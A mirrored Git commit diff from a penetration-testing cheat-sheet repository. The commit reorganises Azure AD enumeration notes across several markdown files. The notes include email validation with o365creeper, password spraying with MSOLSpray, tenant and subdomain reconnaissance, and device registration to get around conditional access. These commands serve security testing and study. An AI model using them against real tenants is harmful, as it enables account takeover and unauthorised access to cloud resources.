swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Enumerate Tenant Informations

pull/2/head
Swissky 2023-11-26 12:44:03 +01:00
parent a432ae494e
commit f7bd9bb527
3 changed files with 95 additions and 110 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

96
docs/cloud/azure/Cloud - Azure Pentest.md
View File

@ -4,12 +4,6 @@
* [Azure Recon Tools](#azure-recon-tools)
* [Enumeration](#enumeration)
* [Enumerate valid emails](#enumerate-valid-emails)
* [Enumerate Azure Subdomains](#enumerate-azure-subdomains)
* [Enumerate tenant with Azure AD Powershell](#enumerate-tenant-with-azure-ad-powershell)
* [Enumerate tenant with Az Powershell](#enumerate-tenant-with-az-powershell)
* [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli)
* [Enumerate manually](#enumerate-manually)
* [Enumeration methodology](#enumeration-methodology)
* [Token from Managed Identity](#token-from-managed-identity)
* [Azure API via Powershell](#azure-api-via-powershell)
@ -197,96 +191,6 @@
## Enumeration
### Enumerate valid emails
> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
* Validate email
```powershell
PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt
admin@<TENANT NAME>.onmicrosoft.com - VALID
root@<TENANT NAME>.onmicrosoft.com - INVALID
test@<TENANT NAME>.onmicrosoft.com - VALID
contact@<TENANT NAME>.onmicrosoft.com - INVALID
```
* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
#### Password spraying
```powershell
PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1
PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Verbose
```
### Enumerate Azure Subdomains
```powershell
PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
Subdomain Service
--------- -------
<TENANT NAME>.mail.protection.outlook.com Email
<TENANT NAME>.onmicrosoft.com Microsoft Hosted Domain
```
### Enumerate tenant with Azure AD Powershell
```powershell
Import-Module C:\Tools\AzureAD\AzureAD.psd1
Import-Module C:\Tools\AzureADPreview\AzureADPreview.psd1
PS> $passwd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
PS> $creds = New-Object System.Management.Automation.PSCredential("test@<TENANT NAME>.onmicrosoft.com", $passwd)
PS Az> Connect-AzureAD -Credential $creds
PS AzureAD> Get-AzureADUser -All $true
PS AzureAD> Get-AzureADUser -All $true | select UserPrincipalName
PS AzureAD> Get-AzureADGroup -All $true
PS AzureAD> Get-AzureADDevice
PS AzureAD> Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
PS AzureADPreview> Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
```
### Enumerate tenant with Az Powershell
```powershell
PS> $passwd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
PS> $creds = New-Object System.Management.Automation.PSCredential ("test@<TENANT NAME>.onmicrosoft.com", $passwd)
PS Az> Connect-AzAccount -Credential $creds
PS Az> Get-AzResource
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
PS Az> Get-AzVM | fl
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
PS Az> Get-AzFunctionApp
PS Az> Get-AzStorageAccount | fl
PS Az> Get-AzKeyVault
```
### Enumerate tenant with az cli
```powershell
PS> az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
PS> az vm list
PS> az vm list --query "[].[name]" -o table
PS> az webapp list
PS> az functionapp list --query "[].[name]" -o table
PS> az storage account list
PS> az keyvault list
```
### Enumerate manually
* Federation with Azure AD or O365
```powershell
https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
```
* Get the Tenant ID
```powershell
https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
```
## Enumeration methodology
```powershell

9
docs/cloud/azure/azure-devices-users-services.md
View File

@ -8,9 +8,10 @@
## Users
```ps1
```
* List users: `Get-AzureADUser -All $true`
* Enumerate groups: `Get-AzureADGroup -All $true`
* Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember`
* List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName`
* Add user to a group
```ps1
$groupid = "<group-id>"
@ -20,6 +21,8 @@
New-MgGroupMember -GroupId $groupid -DirectoryObjectid $targetmember
```
### Use Credentials
### Dynamic Group Membership
Get groups that allow Dynamic membership: `Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}`

100
docs/cloud/azure/azure-enumeration.md
View File

@ -1,14 +1,5 @@
# Azure AD Enumerate
## OSINT AAD - Recon Domains
Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/)
```ps1
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
```
## Azure AD - Collectors
* roadrecon
@ -23,7 +14,93 @@ Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
```
## Azure AD - Conditional Access Policy
## Azure AD - User Enumeration
### Enumerate Tenant Informations
* Federation with Azure AD or O365
```powershell
https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
```
* Get the Tenant ID
```powershell
https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
```
### Enumerate Email
> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
* Validate email
```powershell
PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt
admin@<TENANT NAME>.onmicrosoft.com - VALID
root@<TENANT NAME>.onmicrosoft.com - INVALID
test@<TENANT NAME>.onmicrosoft.com - VALID
contact@<TENANT NAME>.onmicrosoft.com - INVALID
```
* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
### Password Spraying
```powershell
PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1
PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Verbose
```
## Azure Services Enumeration
### Enumerate Tenant Domains
Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/)
```ps1
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
```
### Enumerate Azure Subdomains
```powershell
PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
Subdomain Service
--------- -------
<TENANT NAME>.mail.protection.outlook.com Email
<TENANT NAME>.onmicrosoft.com Microsoft Hosted Domain
```
### Enumerate Services
* Using Az Powershell module
```powershell
PS Az> Get-AzResource
PS Az> Get-AzVM | fl
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
PS Az> Get-AzFunctionApp
PS Az> Get-AzStorageAccount | fl
PS Az> Get-AzKeyVault
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
```
* Using az cli
```powershell
PS> az vm list
PS> az vm list --query "[].[name]" -o table
PS> az webapp list
PS> az functionapp list --query "[].[name]" -o table
PS> az storage account list
PS> az keyvault list
```
## Conditional Access Policy
Conditional Access is used to restrict access to resources to compliant devices only.
@ -59,7 +136,8 @@ Join-AADIntDeviceToIntune -DeviceName "SixByFour"
Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"
```
## Azure AD - MFA
## Multi Factor Authentication
* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
```ps1